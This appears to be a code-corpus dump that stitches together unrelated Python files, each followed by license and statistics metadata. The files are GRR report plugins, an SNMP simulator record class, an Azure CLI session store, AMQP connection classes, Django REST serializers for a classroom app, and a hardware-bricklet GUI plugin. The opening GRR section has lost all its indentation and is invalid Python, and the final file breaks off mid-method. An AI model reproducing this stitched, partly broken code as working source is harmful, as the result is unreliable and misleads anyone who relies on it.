class MostActiveUsersReportPlugin(report_plugin_base.ReportPluginBase):
"""Reports client activity by week."""
TYPE = TYPE
TITLE = "User Breakdown"
SUMMARY = "Active user actions."
REQUIRES_TIME_RANGE = True
def GetReportData(self, get_report_args, token):
"""Filter the last week of user actions."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
PIE_CHART)
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
counts = {}
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
counts.setdefault(event.user, 0)
counts[event.user] += 1
except ValueError: # Couldn't find any logs..
pass
ret.pie_chart.data = sorted(
(rdf_report_plugins.ApiReportDataPoint1D(x=count, label=user)
for user, count in counts.iteritems()
if user not in aff4_users.GRRUser.SYSTEM_USERS),
key=lambda series: series.label)
except IOError:
pass
return ret
class SystemFlowsReportPlugin(report_plugin_base.ReportPluginBase):
"""Count given timerange's system-created flows by type."""
TYPE = TYPE
TITLE = "System Flows"
SUMMARY = ("Flows launched by GRR crons and workers over the given timerange"
" grouped by type.")
REQUIRES_TIME_RANGE = True
def UserFilter(self, username):
return username in aff4_users.GRRUser.SYSTEM_USERS
def GetReportData(self, get_report_args, token):
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
STACK_CHART,
stack_chart=rdf_report_plugins.ApiStackChartReportData(x_ticks=[]))
# TODO(user): move the calculation to a cronjob and store results in
# AFF4.
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
# Store run count total and per-user
counts = {}
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if (event.action == events.AuditEvent.Action.RUN_FLOW and
self.UserFilter(event.user)):
counts.setdefault(event.flow_name, {"total": 0, event.user: 0})
counts[event.flow_name]["total"] += 1
counts[event.flow_name].setdefault(event.user, 0)
counts[event.flow_name][event.user] += 1
except ValueError: # Couldn't find any logs..
pass
for i, (flow, countdict) in enumerate(
sorted(counts.iteritems(), key=lambda x: x[1]["total"],
reverse=True)):
total_count = countdict["total"]
countdict.pop("total")
topusercounts = sorted(
countdict.iteritems(), key=operator.itemgetter(1), reverse=True)[:3]
topusers = ", ".join("%s (%s)" % (user, count)
for user, count in topusercounts)
ret.stack_chart.data.append(
rdf_report_plugins.ApiReportDataSeries2D(
# \u2003 is an emspace, a long whitespace character.
label=u"%s\u2003Run By: %s" % (flow, topusers),
points=[
rdf_report_plugins.ApiReportDataPoint2D(x=i, y=total_count)
]))
except IOError:
pass
return ret
class UserActivityReportPlugin(report_plugin_base.ReportPluginBase):
"""Display user activity by week."""
TYPE = TYPE
TITLE = "User Activity"
SUMMARY = "Number of flows ran by each user over the last few weeks."
# TODO(user): Support timerange selection.
WEEKS = 10
def GetReportData(self, get_report_args, token):
"""Filter the last week of user actions."""
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
STACK_CHART)
try:
user_activity = {}
week_duration = rdfvalue.Duration("7d")
offset = rdfvalue.Duration("%dw" % self.WEEKS)
now = rdfvalue.RDFDatetime.Now()
# TODO(user): Why is the rollover not a duration?
start_time = now - offset - rdfvalue.Duration(
config_lib.CONFIG["Logging.aff4_audit_log_rollover"])
try:
for fd in audit.AuditLogsForTimespan(start_time, now, token):
for event in fd.GenerateItems():
for week in xrange(self.__class__.WEEKS):
start = now - week * week_duration
if start < event.timestamp < (start + week_duration):
weekly_activity = user_activity.setdefault(
event.user, [[x, 0]
for x in xrange(-self.__class__.WEEKS, 0, 1)])
weekly_activity[-week][1] += 1
except ValueError: # Couldn't find any logs..
pass
ret.stack_chart.data = sorted(
(rdf_report_plugins.ApiReportDataSeries2D(
label=user,
points=(rdf_report_plugins.ApiReportDataPoint2D(x=x, y=y)
for x, y in data))
for user, data in user_activity.iteritems()
if user not in aff4_users.GRRUser.SYSTEM_USERS),
key=lambda series: series.label)
except IOError:
pass
return ret
class UserFlowsReportPlugin(report_plugin_base.ReportPluginBase):
"""Count given timerange's user-created flows by type."""
TYPE = TYPE
TITLE = "User Flows"
SUMMARY = ("Flows launched by GRR users over the given timerange grouped by "
"type.")
REQUIRES_TIME_RANGE = True
def UserFilter(self, username):
return username not in aff4_users.GRRUser.SYSTEM_USERS
def GetReportData(self, get_report_args, token):
ret = rdf_report_plugins.ApiReportData(
representation_type=rdf_report_plugins.ApiReportData.RepresentationType.
STACK_CHART,
stack_chart=rdf_report_plugins.ApiStackChartReportData(x_ticks=[]))
# TODO(user): move the calculation to a cronjob and store results in
# AFF4.
try:
timerange_offset = get_report_args.duration
timerange_end = get_report_args.start_time + timerange_offset
# Store run count total and per-user
counts = {}
try:
for event in report_utils.GetAuditLogEntries(timerange_offset,
timerange_end, token):
if (event.action == events.AuditEvent.Action.RUN_FLOW and
self.UserFilter(event.user)):
counts.setdefault(event.flow_name, {"total": 0, event.user: 0})
counts[event.flow_name]["total"] += 1
counts[event.flow_name].setdefault(event.user, 0)
counts[event.flow_name][event.user] += 1
except ValueError: # Couldn't find any logs..
pass
for i, (flow, countdict) in enumerate(
sorted(counts.iteritems(), key=lambda x: x[1]["total"],
reverse=True)):
total_count = countdict["total"]
countdict.pop("total")
topusercounts = sorted(
countdict.iteritems(), key=operator.itemgetter(1), reverse=True)[:3]
topusers = ", ".join("%s (%s)" % (user, count)
for user, count in topusercounts)
ret.stack_chart.data.append(
rdf_report_plugins.ApiReportDataSeries2D(
# \u2003 is an emspace, a long whitespace character.
label=u"%s\u2003Run By: %s" % (flow, topusers),
points=[
rdf_report_plugins.ApiReportDataPoint2D(x=i, y=total_count)
]))
except IOError:
pass
return ret
| apache-2.0 | 3,755,911,516,339,074,000 | 33.223022 | 80 | 0.634223 | false | 3.870627 | false | false | false |
etingof/snmpsim | snmpsim/record/dump.py | 1 | 2041 | #
# This file is part of snmpsim software.
#
# Copyright (c) 2010-2019, Ilya Etingof <[email protected]>
# License: http://snmplabs.com/snmpsim/license.html
#
from pyasn1.error import PyAsn1Error
from pyasn1.type import univ
from snmpsim.error import SnmpsimError
from snmpsim.grammar import dump
from snmpsim.record import abstract
class DumpRecord(abstract.AbstractRecord):
grammar = dump.DumpGrammar()
ext = 'dump'
def evaluate_oid(self, oid):
return univ.ObjectIdentifier(oid)
def evaluate_value(self, oid, tag, value, **context):
try:
value = self.grammar.TAG_MAP[tag](value)
except Exception as exc:
raise SnmpsimError(
'value evaluation error for tag %r, value %r: '
'%s' % (tag, value, exc))
# not all callers supply the context - just ignore it
try:
if (not context['nextFlag'] and
not context['exactMatch'] or
context['setFlag']):
return context['origOid'], tag, context['errorStatus']
except KeyError:
pass
return oid, tag, value
def evaluate(self, line, **context):
oid, tag, value = self.grammar.parse(line)
oid = self.evaluate_oid(oid)
if context.get('oidOnly'):
value = None
else:
try:
oid, tag, value = self.evaluate_value(
oid, tag, value, **context)
except PyAsn1Error as exc:
raise SnmpsimError(
'value evaluation for %s = %r failed: '
'%s\r\n' % (oid, value, exc))
return oid, value
def format_oid(self, oid):
return univ.ObjectIdentifier(oid).prettyPrint()
def format_value(self, oid, value, **context):
return self.format_oid(oid), self.grammar.get_tag_by_type(value), str(value)
def format(self, oid, value, **context):
return self.grammar.build(*self.format_value(oid, value, **context))
| bsd-2-clause | 1,179,372,855,638,163,200 | 28.57971 | 84 | 0.585007 | false | 3.872865 | false | false | false |
yugangw-msft/azure-cli | src/azure-cli-core/azure/cli/core/_session.py | 3 | 3898 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import json
import logging
import os
import time
try:
import collections.abc as collections
except ImportError:
import collections
from codecs import open as codecs_open
from knack.log import get_logger
try:
t_JSONDecodeError = json.JSONDecodeError
except AttributeError: # in Python 2.7
t_JSONDecodeError = ValueError
class Session(collections.MutableMapping):
"""
A simple dict-like class that is backed by a JSON file.
All direct modifications will save the file. Indirect modifications should
be followed by a call to `save_with_retry` or `save`.
"""
def __init__(self, encoding=None):
super(Session, self).__init__()
self.filename = None
self.data = {}
self._encoding = encoding if encoding else 'utf-8-sig'
def load(self, filename, max_age=0):
self.filename = filename
self.data = {}
try:
if max_age > 0:
st = os.stat(self.filename)
if st.st_mtime + max_age < time.time():
self.save()
with codecs_open(self.filename, 'r', encoding=self._encoding) as f:
self.data = json.load(f)
except (OSError, IOError, t_JSONDecodeError) as load_exception:
# OSError / IOError should imply file not found issues which are expected on fresh runs (e.g. on build
# agents or new systems). A parse error indicates invalid/bad data in the file. We do not wish to warn
# on missing files since we expect that, but do if the data isn't parsing as expected.
log_level = logging.INFO
if isinstance(load_exception, t_JSONDecodeError):
log_level = logging.WARNING
get_logger(__name__).log(log_level,
"Failed to load or parse file %s. It will be overridden by default settings.",
self.filename)
self.save()
def save(self):
if self.filename:
with codecs_open(self.filename, 'w', encoding=self._encoding) as f:
json.dump(self.data, f)
def save_with_retry(self, retries=5):
for _ in range(retries - 1):
try:
self.save()
break
except OSError:
time.sleep(0.1)
else:
self.save()
def get(self, key, default=None):
return self.data.get(key, default)
def __getitem__(self, key):
return self.data.setdefault(key, {})
def __setitem__(self, key, value):
self.data[key] = value
self.save_with_retry()
def __delitem__(self, key):
del self.data[key]
self.save_with_retry()
def __iter__(self):
return iter(self.data)
def __len__(self):
return len(self.data)
# ACCOUNT contains subscriptions information
ACCOUNT = Session()
# CONFIG provides external configuration options
CONFIG = Session()
# SESSION provides read-write session variables
SESSION = Session()
# INDEX contains {top-level command: [command_modules and extensions]} mapping index
INDEX = Session()
# VERSIONS provides local versions and pypi versions.
# DO NOT USE it to get the current version of azure-cli,
# it could be lagged behind and can be used to check whether
# an upgrade of azure-cli happens
VERSIONS = Session()
# EXT_CMD_TREE provides command to extension name mapping
EXT_CMD_TREE = Session()
# CLOUD_ENDPOINTS provides endpoints/suffixes of clouds
CLOUD_ENDPOINTS = Session()
| mit | -5,590,041,453,470,257,000 | 31.214876 | 115 | 0.593381 | false | 4.331111 | false | false | false |
runeh/carrot | carrot/connection.py | 1 | 5146 | from amqplib import client_0_8 as amqp
class AMQPConnection(object):
"""A network/socket connection to an AMQP message broker.
:param hostname: see :attr:`hostname`.
:param userid: see :attr:`userid`.
:param password: see :attr:`password`.
:keyword virtual_host: see :attr:`virtual_host`.
:keyword port: see :attr:`port`.
:keyword insist: see :attr:`insist`.
:keyword connect_timeout: see :attr:`connect_timeout`.
.. attribute:: hostname
The hostname to the AMQP server
.. attribute:: userid
A valid username used to authenticate to the server.
.. attribute:: password
The password used to authenticate to the server.
.. attribute:: virtual_host
The name of the virtual host to work with. This virtual host must
exist on the server, and the user must have access to it. Consult
your brokers manual for help with creating, and mapping
users to virtual hosts.
Default is ``"/"``.
.. attribute:: port
The port of the AMQP server. Default is ``5672`` (amqp).
.. attribute:: insist
Insist on connecting to a server. In a configuration with multiple
load-sharing servers, the insist option tells the server that the
client is insisting on a connection to the specified server.
Default is ``False``.
.. attribute:: connect_timeout
The timeout in seconds before we give up connecting to the server.
The default is no timeout.
.. attribute:: ssl
Use SSL to connect to the server.
The default is ``False``.
"""
virtual_host = "/"
port = 5672
insist = False
connect_timeout = None
ssl = False
@property
def host(self):
return ":".join([self.hostname, str(self.port)])
def __init__(self, hostname, userid, password,
virtual_host=None, port=None, **kwargs):
self.hostname = hostname
self.userid = userid
self.password = password
self.virtual_host = virtual_host or self.virtual_host
self.port = port or self.port
self.insist = kwargs.get("insist", self.insist)
self.connect_timeout = kwargs.get("connect_timeout",
self.connect_timeout)
self.ssl = kwargs.get("ssl", self.ssl)
self.connection = None
self.connect()
def connect(self):
"""Establish a connection to the AMQP server."""
self.connection = amqp.Connection(host=self.host,
userid=self.userid,
password=self.password,
virtual_host=self.virtual_host,
insist=self.insist,
ssl=self.ssl,
connect_timeout=self.connect_timeout)
return self.connection
def close(self):
"""Close the currently open connection."""
if self.connection:
self.connection.close()
class DummyConnection(object):
"""A connection class that does nothing, for non-networked backends."""
def __init__(self, *args, **kwargs):
pass
def connect(self):
pass
def close(self):
pass
@property
def host(self):
return ""
class DjangoAMQPConnection(AMQPConnection):
"""A version of :class:`AMQPConnection` that takes configuration
from the Django ``settings.py`` module.
:keyword hostname: The hostname of the AMQP server to connect to,
if not provided this is taken from ``settings.AMQP_SERVER``.
:keyword userid: The username of the user to authenticate to the server
as. If not provided this is taken from ``settings.AMQP_USER``.
:keyword password: The users password. If not provided this is taken
from ``settings.AMQP_PASSWORD``.
:keyword vhost: The name of the virtual host to work with.
This virtual host must exist on the server, and the user must
have access to it. Consult your brokers manual for help with
creating, and mapping users to virtual hosts. If not provided
this is taken from ``settings.AMQP_VHOST``.
:keyword port: The port the AMQP server is running on. If not provided
this is taken from ``settings.AMQP_PORT``, or if that is not set,
the default is ``5672`` (amqp).
"""
def __init__(self, *args, **kwargs):
from django.conf import settings
kwargs["hostname"] = kwargs.get("hostname",
getattr(settings, "AMQP_SERVER"))
kwargs["userid"] = kwargs.get("userid",
getattr(settings, "AMQP_USER"))
kwargs["password"] = kwargs.get("password",
getattr(settings, "AMQP_PASSWORD"))
kwargs["virtual_host"] = kwargs.get("virtual_host",
getattr(settings, "AMQP_VHOST"))
kwargs["port"] = kwargs.get("port",
getattr(settings, "AMQP_PORT", self.port))
super(DjangoAMQPConnection, self).__init__(*args, **kwargs)
| bsd-3-clause | 3,954,186,530,620,627,500 | 32.415584 | 77 | 0.5993 | false | 4.440035 | false | false | false |
VikParuchuri/movide | api/serializers.py | 1 | 19255 | from __future__ import unicode_literals
from django.forms import widgets
from rest_framework import serializers
from models import (Tag, Message, UserProfile, EmailSubscription, Classgroup,
Rating, ClassSettings, Resource, StudentClassSettings,
MESSAGE_TYPE_CHOICES, make_random_key, GRADING_CHOICES, Skill, SkillResource,
Section)
from django.contrib.auth.models import User
from django.db import IntegrityError
import logging
from django.conf import settings
import re
from rest_framework.pagination import PaginationSerializer
from django.contrib.sites.models import get_current_site
from permissions import ClassGroupPermissions
log = logging.getLogger(__name__)
WELCOME_MESSAGE2_TEMPLATE = """
To get started, you might want to create some resources. Resources are stacks of content and problems. Teachers and students can both create resources. Once you make resources, you can tie them to skills. Skills are collections of resources that allow self-paced learning and track student progress. Skills and resources can be discussed using the message function.
"""
WELCOME_MESSAGE_TEMPLATE = """
Welcome to your class {class_name}! You can remove this announcement by hitting the delete button at the bottom right of this. To invite your students, simply tell them to visit the url {class_link} and use the access code {access_key}. You can view these again in the settings view, as well as enable or disable student signup. If you have any questions, please feel free to email [email protected]. Hope you enjoy using Movide!
"""
def alphanumeric_name(string):
return re.sub(r'\W+', '', string.lower().encode("ascii", "ignore"))
def create_classgroups(classgroups, instance):
for c in classgroups:
try:
cg = Classgroup.objects.get(name=c)
except Classgroup.DoesNotExist:
continue
instance.classgroups.add(cg)
instance.save()
class EmailSubscriptionSerializer(serializers.ModelSerializer):
class Meta:
model = EmailSubscription
fields = ("email_address", )
class ClassSettingsField(serializers.SlugRelatedField):
def from_native(self, data):
serializer = ClassSettingsSerializer(data=data)
serializer.save()
return super(ClassSettingsField, self).from_native(data)
class TagSerializer(serializers.Serializer):
pk = serializers.Field()
messages = serializers.SlugRelatedField(many=True, slug_field='text', queryset=Message.objects.all(), required=False)
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", required=False, queryset=Classgroup.objects.all())
description = serializers.CharField()
name = serializers.CharField()
modified = serializers.Field()
display_name = serializers.CharField()
def restore_object(self, attrs, instance=None):
classgroup = attrs.get('classgroup')
name = attrs.get('name')
attributes = ["description"]
if instance is None:
try:
instance = Tag(name=name)
instance.save()
except IntegrityError:
instance = Tag.objects.get(name=alphanumeric_name(name), display_name=name)
try:
instance.classgroup = Classgroup.objects.get(name=classgroup)
except Classgroup.DoesNotExist:
raise serializers.ValidationError("Invalid classgroup specified: {0}".format(classgroup))
else:
cg = Classgroup.objects.get(name=classgroup)
if instance.classgroup != cg:
raise serializers.ValidationError("Classgroup given does not match classgroup on tag: {0}".format(classgroup))
instance = set_attributes(attributes, attrs, instance)
return instance
class RatingSerializer(serializers.Serializer):
message = serializers.PrimaryKeyRelatedField(many=False, queryset=Message.objects.all())
user = serializers.SlugRelatedField(slug_field="username", read_only=True)
rating = serializers.IntegerField()
modified = serializers.Field()
def restore_object(self, attrs, instance=None):
user = self.context['request'].user
message = attrs.get('message')
attributes = ["rating"]
if message.classgroup not in user.classgroups.all():
raise serializers.ValidationError("Attempting rate a post that is not in your class.")
if instance is None:
instance, created = Rating.objects.get_or_create(user=user, message=message)
else:
if instance.user != user:
raise serializers.ValidationError("Attempting to edit a rating that is not yours.")
instance = set_attributes(attributes, attrs, instance)
instance.save()
return instance
class ClassSettingsSerializer(serializers.ModelSerializer):
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", read_only=True)
class Meta:
model = ClassSettings
fields = ("is_public", "moderate_posts", "classgroup",
"modified", "welcome_message", "enable_posting", "description", )
class StudentClassSettingsSerializer(serializers.ModelSerializer):
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", read_only=True)
user = serializers.SlugRelatedField(slug_field="username", read_only=True)
email_frequency_choices = serializers.Field()
class Meta:
model = StudentClassSettings
fields = ("classgroup", "user", "email_frequency", "email_frequency_choices", )
def set_attributes(attributes, values, instance):
for attrib in attributes:
val = values.get(attrib)
if val is not None:
setattr(instance, attrib, val)
return instance
class ClassgroupSerializer(serializers.Serializer):
name = serializers.CharField()
display_name = serializers.Field()
class_settings = serializers.RelatedField(many=False, required=False)
owner = serializers.SlugRelatedField(many=False, slug_field="username", required=False, queryset=User.objects.all())
users = serializers.SlugRelatedField(many=True, slug_field="username", required=False, queryset=User.objects.all())
pk = serializers.Field()
modified = serializers.Field()
created = serializers.Field()
link = serializers.Field(source="link")
def restore_object(self, attrs, instance=None):
user = self.context['request'].user
name = attrs.get('name')
class_settings_values = attrs.get('class_settings')
attributes = ["description"]
settings_attributes = ['moderate_posts', 'is_public', 'allow_signups']
if instance is None:
try:
instance = Classgroup(owner=user, name=alphanumeric_name(name), display_name=name)
instance.save()
user.classgroups.add(instance)
user.save()
cg_perm = ClassGroupPermissions(instance)
cg_perm.setup()
cg_perm.assign_access_level(user, cg_perm.administrator)
try:
class_settings = ClassSettings(classgroup=instance, access_key=make_random_key())
class_settings.save()
except IntegrityError:
class_settings = ClassSettings.objects.get(classgroup=instance)
try:
message = Message(
user=user,
classgroup=instance,
source="welcome",
text=WELCOME_MESSAGE2_TEMPLATE,
message_type="A",
)
message.save()
message = Message(
user=user,
classgroup=instance,
source="welcome",
text=WELCOME_MESSAGE_TEMPLATE.format(
class_name=instance.display_name,
class_link=get_current_site(self.context['request']).domain + instance.link(),
access_key=class_settings.access_key
),
message_type="A",
)
message.save()
except IntegrityError:
pass
except IntegrityError:
error_msg = "Class name is already taken."
log.exception(error_msg)
raise serializers.ValidationError(error_msg)
else:
if not ClassGroupPermissions.is_teacher(instance, user):
raise serializers.ValidationError("Class name is already taken.")
class_settings = instance.class_settings
instance = set_attributes(attributes, attrs, instance)
if class_settings_values is not None:
class_settings = set_attributes(settings_attributes, class_settings_values, class_settings)
class_settings.save()
return instance
class RatingField(serializers.RelatedField):
def to_native(self, value):
return {
'rating': value.rating,
'user': value.user.username,
}
class MessageSerializer(serializers.Serializer):
pk = serializers.Field()
reply_count = serializers.Field(source="reply_count")
tags = serializers.SlugRelatedField(many=True, slug_field="name", required=False, queryset=Tag.objects.all())
user = serializers.SlugRelatedField(many=False, slug_field="username", required=False, queryset=User.objects.all())
user_image = serializers.Field(source="profile_image")
reply_to = serializers.PrimaryKeyRelatedField(required=False, queryset=Message.objects.all())
ratings = RatingField(many=True, read_only=True, required=False)
classgroup = serializers.SlugRelatedField(slug_field="name", required=False, queryset=Classgroup.objects.all())
resources = serializers.PrimaryKeyRelatedField(many=True, required=False, queryset=Resource.objects.all())
created_timestamp = serializers.Field(source="created_timestamp")
text = serializers.CharField()
source = serializers.CharField()
created = serializers.Field()
reply_count = serializers.Field()
approved = serializers.Field()
modified = serializers.Field()
depth = serializers.Field(source="depth")
avatar_url = serializers.Field(source="avatar_url")
message_type = serializers.ChoiceField(choices=MESSAGE_TYPE_CHOICES, default="D")
total_rating = serializers.Field(source="total_rating")
def restore_object(self, attrs, instance=None):
user = self.context['request'].user
classgroup = attrs.get('classgroup')
attributes = ["text", "source", "reply_to"]
if (classgroup.class_settings is not None and
classgroup.class_settings.enable_posting is False and
not ClassGroupPermissions.is_teacher(classgroup, user)):
raise serializers.ValidationError("You are not allowed to make a post right now.")
if instance is None:
instance = Message(user=user, classgroup=classgroup)
else:
if instance.user != user:
raise serializers.ValidationError("Attempting to edit a message that is not yours.")
message_type = attrs.get('message_type')
if message_type == "A" and not ClassGroupPermissions.is_teacher(classgroup, user):
raise serializers.ValidationError("You cannot make an announcement unless you own a course.")
instance.message_type = message_type
instance = set_attributes(attributes, attrs, instance)
instance.save()
return instance
class PaginatedMessageSerializer(PaginationSerializer):
class Meta:
object_serializer_class = MessageSerializer
class NotificationSerializer(MessageSerializer):
notification_text = serializers.Field()
notification_created = serializers.Field()
notification_created_timestamp = serializers.Field()
class PaginatedNotificationSerializer(PaginationSerializer):
class Meta:
object_serializer_class = NotificationSerializer
class ResourceSerializer(serializers.Serializer):
pk = serializers.Field()
user = serializers.SlugRelatedField(many=False, slug_field="username", read_only=True)
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", read_only=True)
approved = serializers.BooleanField()
name = serializers.CharField()
display_name = serializers.Field()
section = serializers.SlugRelatedField(many=False, slug_field="name", required=False, read_only=True)
created_timestamp = serializers.Field(source="created_timestamp")
priority = serializers.Field()
modified = serializers.Field()
created = serializers.Field()
def restore_object(self, attrs, instance=None):
user = self.context['request'].user
classgroup = attrs.get('classgroup')
name = attrs.get('name')
attributes = ['data', 'approved']
if instance is None:
instance = Resource(user=user, classgroup=classgroup, name=alphanumeric_name(name), display_name=name)
instance.save()
else:
if instance.user != user:
raise serializers.ValidationError("Class name is already taken.")
instance = set_attributes(attributes, attrs, instance)
return instance
class PaginatedResourceSerializer(PaginationSerializer):
class Meta:
object_serializer_class = ResourceSerializer
def create_user_profile(user):
profile = UserProfile(user=user)
profile.save()
class UserSerializer(serializers.Serializer):
image = serializers.Field(source="profile.image")
username = serializers.CharField()
messages = serializers.SlugRelatedField(many=True, slug_field="text", read_only=True, required=False)
resources = serializers.SlugRelatedField(many=True, slug_field="name", read_only=True, required=False)
classgroups = serializers.SlugRelatedField(many=True, slug_field="name", required=False, queryset=Classgroup.objects.all())
pk = serializers.Field()
def restore_object(self, attrs, instance=None):
username = attrs.get('username')
classgroups = attrs.get('classgroups')
try:
instance = User.objects.get(username=username)
except User.DoesNotExist:
try:
password = User.objects.make_random_password(10)
instance = User.objects.create_user(username=username, password=password)
except IntegrityError:
instance = User.objects.get(username=username)
try:
create_user_profile(instance)
except Exception:
error_msg = "Could not create a user profile."
log.exception(error_msg)
instance.delete()
raise serializers.ValidationError(error_msg)
create_classgroups(classgroups, instance)
if instance.classgroups.count()==0:
raise serializers.ValidationError("Invalid classgroups specified: {0}".format(classgroups))
return instance
class ClassgroupStatsSerializer(serializers.Serializer):
pk = serializers.Field()
network_info = serializers.Field(source="network_info")
message_count_by_day = serializers.Field(source="message_count_by_day")
message_count_today = serializers.Field(source="message_count_today")
message_count = serializers.Field(source="message_count")
user_count = serializers.Field(source="user_count")
user_count_today = serializers.Field(source="user_count_today")
display_name = serializers.Field()
name = serializers.CharField()
modified = serializers.Field()
class SectionSerializer(serializers.Serializer):
pk = serializers.Field()
name = serializers.CharField()
display_name = serializers.CharField(required=False)
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", required=False, queryset=Classgroup.objects.all())
modified = serializers.Field()
created = serializers.Field()
def restore_object(self, attrs, instance=None):
classgroup = attrs.get('classgroup')
name = attrs.get('name')
user = self.context['request'].user
if instance is None:
instance = Section(classgroup=classgroup, name=alphanumeric_name(name), display_name=name)
instance.save()
else:
if not ClassGroupPermissions.is_teacher(classgroup, user):
raise serializers.ValidationError("You do not have permission to modify this section.")
instance.name = alphanumeric_name(name)
instance.display_name = name
return instance
class SkillSerializer(serializers.Serializer):
pk = serializers.Field()
classgroup = serializers.SlugRelatedField(many=False, slug_field="name", required=False, queryset=Classgroup.objects.all())
resource_text = serializers.Field(source="resource_text")
resource_ids = serializers.Field(source="resource_ids")
grading_policy = serializers.ChoiceField(choices=GRADING_CHOICES, default="COM")
name = serializers.CharField()
display_name = serializers.Field()
created_timestamp = serializers.Field(source="created_timestamp")
modified = serializers.Field()
created = serializers.Field()
def restore_object(self, attrs, instance=None):
classgroup = attrs.get('classgroup')
name = attrs.get('name')
attributes = ['grading_policy']
user = self.context['request'].user
if instance is None:
instance = Skill(classgroup=classgroup, name=alphanumeric_name(name), display_name=name)
instance.save()
else:
if not ClassGroupPermissions.is_teacher(classgroup, user):
raise serializers.ValidationError("You do not have permission to modify this skill.")
instance.name = alphanumeric_name(name)
instance.display_name = name
resources = self.context['request'].DATA.get('resources')
if isinstance(resources, basestring):
resources = [resources]
if resources is not None:
resources = [str(r).strip() for r in resources]
else:
resources = []
skill_resources = []
for (i, r) in enumerate(resources):
if len(r) < 1:
continue
resource = Resource.objects.get(display_name=r, classgroup=classgroup)
skill_resource, created = SkillResource.objects.get_or_create(
resource=resource,
skill=instance
)
skill_resource.priority = i
skill_resource.save()
skill_resources.append(skill_resource)
for s in SkillResource.objects.filter(skill=instance):
if s not in skill_resources:
s.delete()
instance = set_attributes(attributes, attrs, instance)
return instance
class PaginatedSkillSerializer(PaginationSerializer):
class Meta:
object_serializer_class = SkillSerializer
| agpl-3.0 | -4,851,591,364,296,762,000 | 41.694013 | 432 | 0.661906 | false | 4.521014 | false | false | false |
Tinkerforge/brickv | src/brickv/plugin_system/plugins/motorized_linear_poti/motorized_linear_poti.py | 1 | 5261 | # -*- coding: utf-8 -*-
"""
Motorized LinearPoti Plugin
Copyright (C) 2015-2017 Olaf Lüke <[email protected]>
Copyright (C) 2016 Matthias Bolte <[email protected]>
motorized_linear_poti.py: Motorized Linear Poti Plugin implementation
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with this program; if not, write to the
Free Software Foundation, Inc., 59 Temple Place - Suite 330,
Boston, MA 02111-1307, USA.
"""
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QSlider, QCheckBox, QFrame, QComboBox
from brickv.plugin_system.comcu_plugin_base import COMCUPluginBase
from brickv.bindings.bricklet_motorized_linear_poti import BrickletMotorizedLinearPoti
from brickv.plot_widget import PlotWidget, CurveValueWrapper, FixedSizeLabel
from brickv.async_call import async_call
from brickv.callback_emulator import CallbackEmulator
class MotorPositionLabel(FixedSizeLabel):
def setText(self, text):
text = "Motor Target Position: " + text
super(MotorPositionLabel, self).setText(text)
class MotorizedLinearPoti(COMCUPluginBase):
def __init__(self, *args):
super().__init__(BrickletMotorizedLinearPoti, *args)
self.mp = self.device
self.cbe_position = CallbackEmulator(self,
self.mp.get_position,
None,
self.cb_position,
self.increase_error_count)
self.current_position = CurveValueWrapper()
self.slider = QSlider(Qt.Horizontal)
self.slider.setRange(0, 100)
self.slider.setMinimumWidth(200)
self.slider.setEnabled(False)
plots = [('Potentiometer Position', Qt.red, self.current_position, str)]
self.plot_widget = PlotWidget('Position', plots, extra_key_widgets=[self.slider],
update_interval=0.025, y_resolution=1.0)
self.motor_slider = QSlider(Qt.Horizontal)
self.motor_slider.setRange(0, 100)
self.motor_slider.valueChanged.connect(self.motor_slider_value_changed)
self.motor_hold_position = QCheckBox("Hold Position")
self.motor_drive_mode = QComboBox()
self.motor_drive_mode.addItem('Fast')
self.motor_drive_mode.addItem('Smooth')
def get_motor_slider_value():
return self.motor_slider.value()
self.motor_hold_position.stateChanged.connect(lambda x: self.motor_slider_value_changed(get_motor_slider_value()))
self.motor_drive_mode.currentIndexChanged.connect(lambda x: self.motor_slider_value_changed(get_motor_slider_value()))
self.motor_position_label = MotorPositionLabel('Motor Target Position:')
hlayout = QHBoxLayout()
hlayout.addWidget(self.motor_position_label)
hlayout.addWidget(self.motor_slider)
hlayout.addWidget(self.motor_drive_mode)
hlayout.addWidget(self.motor_hold_position)
line = QFrame()
line.setObjectName("line")
line.setFrameShape(QFrame.HLine)
line.setFrameShadow(QFrame.Sunken)
layout = QVBoxLayout(self)
layout.addWidget(self.plot_widget)
layout.addWidget(line)
layout.addLayout(hlayout)
def start(self):
async_call(self.mp.get_motor_position, None, self.get_motor_position_async, self.increase_error_count)
self.cbe_position.set_period(25)
self.plot_widget.stop = False
def stop(self):
self.cbe_position.set_period(0)
self.plot_widget.stop = True
def destroy(self):
pass
@staticmethod
def has_device_identifier(device_identifier):
return device_identifier == BrickletMotorizedLinearPoti.DEVICE_IDENTIFIER
def cb_position(self, position):
self.current_position.value = position
self.slider.setValue(position)
def get_motor_position_async(self, motor):
self.motor_slider.blockSignals(True)
self.motor_hold_position.blockSignals(True)
self.motor_drive_mode.blockSignals(True)
self.motor_hold_position.setChecked(motor.hold_position)
self.motor_drive_mode.setCurrentIndex(motor.drive_mode)
self.motor_position_label.setText(str(motor.position))
self.motor_slider.setValue(motor.position)
self.motor_slider.blockSignals(False)
self.motor_hold_position.blockSignals(False)
self.motor_drive_mode.blockSignals(False)
def motor_slider_value_changed(self, position):
